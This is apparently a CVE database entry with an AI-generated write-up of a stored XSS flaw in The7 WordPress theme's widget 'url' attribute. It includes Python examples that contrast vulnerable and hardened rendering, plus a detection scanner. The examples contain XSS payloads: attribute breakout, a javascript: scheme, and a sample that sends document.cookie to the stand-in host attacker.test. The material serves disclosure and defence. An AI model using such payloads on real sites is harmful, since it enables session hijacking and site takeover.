CVE-2024-5451
Description
The The7 — Website and eCommerce Builder for WordPress theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's Icon and Heading widgets in all versions up to, and including, 11.13.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in The7 theme for WordPress via 'url' attribute in Icon and Heading widgets allows authenticated contributors to inject arbitrary web scripts.
Vulnerability Overview
CVE-2024-5451 is a stored cross-site scripting vulnerability in the The7 — Website and eCommerce Builder for WordPress theme, affecting all versions up to and including 11.13.0. The 'url' attribute of the theme's Icon and Heading widgets is neither sanitized when the widget is saved nor escaped when it is rendered, so a value supplied in that attribute reaches the page's HTML unchanged. An authenticated attacker with contributor-level access or higher can therefore store arbitrary script in a page.
Exploitation Conditions
The attacker needs an account with at least contributor-level access. In WordPress, contributors can create and edit their own posts but cannot publish them, which is enough here: the attacker places an affected Icon or Heading widget in a post and supplies a malicious value for its 'url' attribute, for example a value that closes the quoted href and adds an event handler, or a javascript: link target. The value is stored with the post and executes in the browser of anyone who views the page, including an editor or administrator who previews the submission before publishing it.
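The following is an added example, not code from The7 or from this page. It is a small Python renderer that reproduces the vulnerable pattern described above (the widget's 'url' attribute concatenated straight into an href) beside a hardened version that mirrors what WordPress's esc_url() and esc_attr() do, plus a check that parses the output the way a browser would. It goes slightly beyond the description by showing both payload classes this bug admits, attribute breakout and a script-capable scheme. The function names, the scheme allowlist and the payloads are assumptions constructed for the example; The7's real rendering code is PHP and is not shown on this page.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Link schemes the hardened renderer accepts. WordPress's esc_url() carries a
# longer allowlist; this short list is an assumption made for the example.
ALLOWED_SCHEMES = {"http", "https", "mailto", "tel"}


def render_link_vulnerable(attrs: dict) -> str:
    """Insecure pattern (assumed, not The7's code): the widget's 'url'
    attribute is dropped into href unchanged, so a value that closes the
    quote or uses a javascript: scheme reaches the browser intact."""
    url = attrs.get("url", "#")
    label = attrs.get("text", "")
    return f'<a class="widget-link" href="{url}">{label}</a>'


def esc_url(url: str) -> str:
    """Stand-in for WordPress esc_url(): drop control characters (browsers
    ignore tabs and newlines inside a scheme, so 'java\\tscript:' still runs),
    reject schemes outside the allowlist, then entity-encode for an attribute
    context so quotes cannot terminate the href."""
    url = "".join(ch for ch in url if ch.isprintable()).strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return ""
    return html.escape(url, quote=True)


def render_link_hardened(attrs: dict) -> str:
    """Same markup, with 'url' escaped for the href context and the label
    escaped for the element-body context (esc_url / esc_attr equivalents)."""
    url = esc_url(attrs.get("url", "#")) or "#"
    label = html.escape(attrs.get("text", ""), quote=True)
    return f'<a class="widget-link" href="{url}">{label}</a>'


class _AttrCollector(HTMLParser):
    """Collects every (name, value) attribute pair from the markup."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def executes_script(markup: str) -> bool:
    """Parse the rendered markup as a browser would (entities decoded, tags
    and attributes split) and report whether it carries an event-handler
    attribute or a javascript: link target. A regex over the raw string
    would misfire here: the escaped payload still contains the substring
    'onmouseover=' even though it is inert inside the href value."""
    parser = _AttrCollector()
    parser.feed(markup)
    for name, value in parser.attrs:
        if name.lower().startswith("on"):
            return True
        if name.lower() == "href" and (value or "").strip().lower().startswith("javascript:"):
            return True
    return False


# Constructed payloads for the two common forms of this bug: breaking out of
# the quoted attribute, and abusing a script-capable URL scheme.
PAYLOADS = {
    "breakout": {"url": '" onmouseover="alert(document.cookie)', "text": "Read more"},
    "js_scheme": {"url": "javascript:alert(document.domain)", "text": "Read more"},
    "benign": {"url": "https://example.com/page", "text": "Read more"},
}

if __name__ == "__main__":
    for name, attrs in PAYLOADS.items():
        for renderer in (render_link_vulnerable, render_link_hardened):
            out = renderer(attrs)
            print(f"{name:10s} {renderer.__name__:24s} executes={executes_script(out)}  {out}")
```

In a real WordPress theme the equivalent fix is to pass the attribute through esc_url() at the exact point it is echoed into href (and esc_attr() or esc_html() for other contexts); sanitizing only on save is not enough, because the stored value can still be altered through other code paths and the output context is what decides how the browser interprets it.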
Impact
Successful exploitation leads to arbitrary script execution in the context of a victim's browser on the affected site's origin. This can result in data theft, session hijacking, defacement, or other malicious activity, and it affects any user who visits the page, including administrators. Script running in an administrator's session can act with that user's privileges, for example by creating additional administrator accounts or installing plugins, which turns a contributor account into full site compromise.
Mitigation
The vendor, Dream-Theme, has released versions later than 11.13.0. The changelog does not name CVE-2024-5451 explicitly, but the theme's release history shows ongoing security fixes [1], so sites should update The7 to the latest version. Because the payload is stored with the page, updating does not remove values a contributor has already saved; content created by contributor-level accounts should be reviewed, and contributor access granted only to accounts that need it.
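Updating stops the theme from rendering the value unsafely, but anything a contributor has already saved is still in the database, and an incident responder will want to know which accounts stored such values. The block below is an added example, not The7's or this page's code: it scans stored widget content for 'url' attributes whose value carries a script-capable scheme or quote characters that break out of the attribute. The sample rows, the shortcode tag names and the JSON widget shape are constructed placeholders; where The7 actually stores these attributes (shortcodes in post_content or page-builder data in postmeta) is not stated on this page, so the scanner accepts both forms.

```python
import json
import re

# Sample stored content, constructed for this example. The row layout mimics
# wp_posts (ID, post_author, post_content); the shortcode tags 'example_icon'
# and 'example_heading' and the JSON widget shape are placeholders, not The7's
# real storage format. attacker.test is a reserved, non-routable domain.
SAMPLE_ROWS = [
    (101, 7, '[example_icon url="https://example.com/docs" icon="star"]'),
    (102, 9, "[example_icon url='javascript:fetch(\"//attacker.test/?c=\"+document.cookie)' icon='star']"),
    (103, 9, "[example_heading url='\" onmouseover=\"alert(document.domain)' text='Hi']"),
    (104, 3, '{"widgetType":"heading","settings":{"url":"https://example.com","title":"Ok"}}'),
    (105, 9, '{"widgetType":"icon","settings":{"url":"data:text/html,<script>alert(1)</script>"}}'),
]

# Shortcode form: url="..." or url='...'. Single quotes are how a shortcode
# attribute legitimately carries a double quote, which is exactly what an
# attribute-breakout payload needs.
SHORTCODE_URL = re.compile(r"""\burl\s*=\s*(['"])(.*?)\1""", re.S)
# JSON form: "url":"..." with JSON escaping; the captured string is decoded.
JSON_URL = re.compile(r'"url"\s*:\s*("(?:[^"\\]|\\.)*")')
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")


def classify_url_value(value: str):
    """Return a short reason if the stored value looks like an XSS payload,
    else None. Control characters are dropped before the scheme check
    because browsers ignore tabs and newlines inside a scheme."""
    cleaned = "".join(ch for ch in value if ch.isprintable()).strip().lower()
    if cleaned.startswith(DANGEROUS_SCHEMES):
        return "script-capable scheme"
    if any(ch in value for ch in "\"'<>"):
        return "attribute breakout characters"
    return None


def extract_url_values(content: str):
    """Yield every 'url' attribute value found in shortcode or JSON form."""
    for _quote, raw in SHORTCODE_URL.findall(content):
        yield raw
    for raw in JSON_URL.findall(content):
        yield json.loads(raw)


def find_suspicious_urls(rows):
    """Walk stored rows and report (post_id, author_id, value, reason) for
    each 'url' value that classify_url_value() flags."""
    findings = []
    for post_id, author_id, content in rows:
        for value in extract_url_values(content):
            reason = classify_url_value(value)
            if reason:
                findings.append((post_id, author_id, value, reason))
    return findings


if __name__ == "__main__":
    for post_id, author_id, value, reason in find_suspicious_urls(SAMPLE_ROWS):
        print(f"post {post_id} author {author_id}: {reason}: {value!r}")
```

Feed it rows from wp_posts.post_content and from the page builder's postmeta, treat repeated hits from one author as a lead on the account to disable, and remember that a hit only means a payload was stored, not that it ever rendered; that depends on which theme version was live at the time.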
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches discovered yet)
References: 3
News mentions: 0 (no linked articles in the index yet)